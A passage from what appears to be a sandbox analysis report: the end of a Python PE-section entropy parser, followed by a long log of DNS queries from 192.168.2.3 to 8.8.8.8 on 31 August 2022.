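              f"entropy={s['entropy']:.3f} {'|'.join(s['flags'])}"
              f"{'' if s['standard'] else '  <-- non-standard name'}")
    print("RVA 0x3060 lives in", section_for_rva(parse_sections(pe), 0x3060))
```

To reproduce the report's table for a real file, pass the file's bytes (open(path, "rb").read()) to parse_sections; the constructed image only exercises the parser. An unusual section name is a weak signal on its own, so read it together with the entropy column and with where the data directories point, as the report does.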
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                       UDP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Aug 31, 2022 23:58:42.943233967 CEST53607498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:42.963799000 CEST6075053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:42.983344078 CEST53607508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:42.984219074 CEST6075153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.002011061 CEST53607518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.003278017 CEST6075253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.023278952 CEST53607528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.024086952 CEST6075353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.043633938 CEST53607538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.044194937 CEST6075453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:43.062766075 CEST53607548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:43.196578026 CEST53607498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:45.860322952 CEST5694953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.470341921 CEST53569498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.506845951 CEST5695053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.525938988 CEST53569508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.526858091 CEST5695153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.544490099 CEST53569518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.555077076 CEST5695253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.573009968 CEST53569528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.573612928 CEST5695353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.593744993 CEST53569538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:46.594398022 CEST5695453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:46.614161015 CEST53569548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.439661980 CEST5384453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.489172935 CEST53538448.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.509126902 CEST5384553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.528167963 CEST53538458.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.529035091 CEST5384653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.548969030 CEST53538468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.552397013 CEST5384753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.570151091 CEST53538478.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.570688963 CEST5384853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.590229988 CEST53538488.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:52.590786934 CEST5384953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:52.608671904 CEST53538498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.559582949 CEST6501753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.588342905 CEST53650178.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.611123085 CEST6501853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.628262997 CEST53650188.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.630989075 CEST6501953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.650563002 CEST53650198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.651252031 CEST6502053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.668998957 CEST53650208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.669703007 CEST6502153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.689425945 CEST53650218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:54.690068007 CEST6502253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:54.709500074 CEST53650228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.637871027 CEST5346653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.674391985 CEST53534668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.711035013 CEST5346753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.730349064 CEST53534678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.731127977 CEST5346853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.748970032 CEST53534688.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.749512911 CEST5346953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.769344091 CEST53534698.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.772804976 CEST5347053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.792510033 CEST53534708.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:56.793273926 CEST5347153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:56.812910080 CEST53534718.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.232460976 CEST5362353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.266350985 CEST53536238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.292783976 CEST5362453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.311882973 CEST53536248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.312763929 CEST5362553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.332475901 CEST53536258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.338818073 CEST5362653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.356389046 CEST53536268.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.357353926 CEST5362753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.374880075 CEST53536278.8.8.8192.168.2.3
                                      Aug 31, 2022 23:58:59.376303911 CEST5362853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:58:59.394289017 CEST53536288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.363595963 CEST6141653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.399610996 CEST53614168.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.436424971 CEST6141753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.453686953 CEST53614178.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.454658031 CEST6141853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.474419117 CEST53614188.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.474961042 CEST6141953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.492651939 CEST53614198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.493232965 CEST6142053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.511037111 CEST53614208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:01.511754036 CEST6142153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:01.529551029 CEST53614218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.366775036 CEST6519653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.405114889 CEST53651968.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.423759937 CEST6519753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.440768003 CEST53651978.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.441447020 CEST6519853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.461023092 CEST53651988.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.462712049 CEST6519953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.482172012 CEST53651998.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.482703924 CEST6520053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.502460003 CEST53652008.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.503720045 CEST6520153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.521188974 CEST53652018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:05.917948008 CEST5870853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.501457930 CEST53587088.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.518330097 CEST5870953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.537347078 CEST53587098.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.541033030 CEST5871053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.560595989 CEST53587108.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.561108112 CEST5871153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.581572056 CEST53587118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.582118988 CEST5871253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.599746943 CEST53587128.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.600199938 CEST5871353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.617580891 CEST53587138.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:11.520944118 CEST5304953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.252245903 CEST53530498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.277647972 CEST5305053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.296758890 CEST53530508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.297575951 CEST5305153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.317811966 CEST53530518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.328339100 CEST5305253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.348246098 CEST53530528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.348893881 CEST5305353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.368700981 CEST53530538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.369224072 CEST5305453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.389571905 CEST53530548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.234563112 CEST6008853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.311661005 CEST53600888.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.331684113 CEST6008953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.352329969 CEST53600898.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.353291035 CEST6009053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.371464014 CEST53600908.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.371988058 CEST6009153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.392226934 CEST53600918.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.392903090 CEST6009253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.412553072 CEST53600928.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.413882971 CEST6009353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.435400963 CEST53600938.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.707844973 CEST6356253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.756638050 CEST53635628.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.767276049 CEST6356353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.786377907 CEST53635638.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.789041996 CEST6356453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.808978081 CEST53635648.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.809427023 CEST6356553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.827245951 CEST53635658.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.838541031 CEST6356653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.856257915 CEST53635668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.856786013 CEST6356753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.874497890 CEST53635678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:17.091232061 CEST5342853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.080478907 CEST5342853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.240111113 CEST53534288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.249520063 CEST5342953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.268676043 CEST53534298.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.269253969 CEST5343053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.286752939 CEST53534308.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.287184954 CEST5343153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.304971933 CEST53534318.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.305428028 CEST5343253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.325037003 CEST53534328.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.325584888 CEST5343353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.345073938 CEST53534338.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.697067022 CEST53534288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:19.656590939 CEST6551153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.653614998 CEST6551153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.690124035 CEST53655118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.699863911 CEST6551253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.719475031 CEST53655128.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.720499992 CEST6551353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.740108013 CEST53655138.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.740564108 CEST6551453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.757486105 CEST53655118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.760489941 CEST53655148.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.761806011 CEST6551553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.779664040 CEST53655158.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.780160904 CEST6551653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.799532890 CEST53655168.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.015532970 CEST5982053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.145498037 CEST53598208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.154289007 CEST5982153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.173274994 CEST53598218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.173866034 CEST5982253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.191287994 CEST53598228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.195880890 CEST5982353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.215575933 CEST53598238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.215950966 CEST5982453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.235313892 CEST53598248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.235685110 CEST5982553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.255491972 CEST53598258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:23.593552113 CEST6482353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.179404020 CEST53648238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.188785076 CEST5199353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.206090927 CEST53519938.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.206868887 CEST5199453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.226692915 CEST53519948.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.227190971 CEST5199553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.245124102 CEST53519958.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.245595932 CEST5199653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.265338898 CEST53519968.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.265731096 CEST5199753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.285284042 CEST53519978.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:25.542416096 CEST5811953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:26.630718946 CEST5811953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.165951967 CEST53581198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.172085047 CEST5812053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.189124107 CEST53581208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.189977884 CEST5812153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.209870100 CEST53581218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.247838974 CEST5812253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.267399073 CEST53581228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.268862963 CEST5812353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.286777020 CEST53581238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.287358046 CEST5812453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.307277918 CEST53581248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.705112934 CEST53581198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:28.925348043 CEST4916653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.260584116 CEST4916653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.836324930 CEST53491668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.844980955 CEST4916753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.862699986 CEST53491678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.866137028 CEST4916853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.884212971 CEST53491688.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.884764910 CEST4916953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.904670000 CEST53491698.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.905071974 CEST4917053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.922668934 CEST53491708.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.923072100 CEST4917153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.942532063 CEST53491718.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.146146059 CEST53491668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.225573063 CEST5830153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.299428940 CEST53583018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.305984020 CEST5830253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.323093891 CEST53583028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.323930025 CEST5830353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.343451023 CEST53583038.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.344903946 CEST5830453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.364872932 CEST53583048.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.365597963 CEST5830553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.385454893 CEST53583058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.396919012 CEST5830653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.415087938 CEST53583068.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:33.635987043 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:34.632500887 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:35.644903898 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.530746937 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.543714046 CEST6344753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.563038111 CEST53634478.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.563648939 CEST6344853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.583677053 CEST53634488.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.584182024 CEST6344953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.602057934 CEST53634498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.602427959 CEST6345053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.620131016 CEST53634508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.620733023 CEST6345153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.640644073 CEST53634518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.792453051 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:37.851984024 CEST4987453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:38.863599062 CEST4987453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.088445902 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.439719915 CEST53498748.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.448174953 CEST4987553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.465456009 CEST53498758.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.465929985 CEST4987653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.483722925 CEST53498768.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.484544992 CEST4987753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.503002882 CEST53498778.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.503390074 CEST4987853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.521054029 CEST53498788.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.521467924 CEST4987953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.540900946 CEST53498798.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.567404985 CEST53498748.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.790900946 CEST6538553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.827275038 CEST53653858.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.836529016 CEST6538653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.853662968 CEST53653868.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.854235888 CEST6538753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.873889923 CEST53653878.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.874320984 CEST6538853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.891818047 CEST53653888.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.892307043 CEST6538953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.909749031 CEST53653898.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.910653114 CEST6539053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.930310965 CEST53653908.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.179858923 CEST5415353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.224383116 CEST53541538.8.8.8192.168.2.3
Aug 31, 2022 23:59:42.235496044 CEST | 54154 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:42.254621983 CEST | 53 | 54154 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:42.262891054 CEST | 54155 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:42.280628920 CEST | 53 | 54155 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:42.281209946 CEST | 54156 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:42.301055908 CEST | 53 | 54156 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:42.301537037 CEST | 54157 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:42.321456909 CEST | 53 | 54157 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:42.322125912 CEST | 54158 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:42.341794014 CEST | 53 | 54158 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:43.590250015 CEST | 64602 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:44.583146095 CEST | 64602 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.599035978 CEST | 64602 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.634243011 CEST | 53 | 64602 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.651026011 CEST | 64603 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.670564890 CEST | 53 | 64603 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.671057940 CEST | 64604 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.691019058 CEST | 53 | 64604 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.691448927 CEST | 64605 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.711270094 CEST | 53 | 64605 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.711695910 CEST | 64606 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.729429960 CEST | 53 | 64606 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.737027884 CEST | 64607 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:45.756819010 CEST | 53 | 64607 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:45.793020010 CEST | 53 | 64602 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:46.698057890 CEST | 53 | 64602 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:47.058562040 CEST | 50784 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.075234890 CEST | 50784 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.139800072 CEST | 53 | 50784 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.150029898 CEST | 50785 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.167660952 CEST | 53 | 50785 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.168544054 CEST | 50786 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.188586950 CEST | 53 | 50786 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.189199924 CEST | 50787 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.209095001 CEST | 53 | 50787 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.220005989 CEST | 50788 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.238341093 CEST | 53 | 50788 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.239259958 CEST | 50789 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:48.259392023 CEST | 53 | 50789 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:48.697335958 CEST | 53 | 50784 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:49.506455898 CEST | 64121 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.521322966 CEST | 64121 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.544496059 CEST | 53 | 64121 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.556144953 CEST | 64122 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.575448990 CEST | 53 | 64122 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.576560974 CEST | 64123 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.592947006 CEST | 53 | 64121 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.596391916 CEST | 53 | 64123 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.605078936 CEST | 64124 | 53 | 192.168.2.3 | 8.8.8.8
Aug 31, 2022 23:59:50.624696016 CEST | 53 | 64124 | 8.8.8.8 | 192.168.2.3
Aug 31, 2022 23:59:50.625201941 CEST | 64125 | 53 | 192.168.2.3 | 8.8.8.8
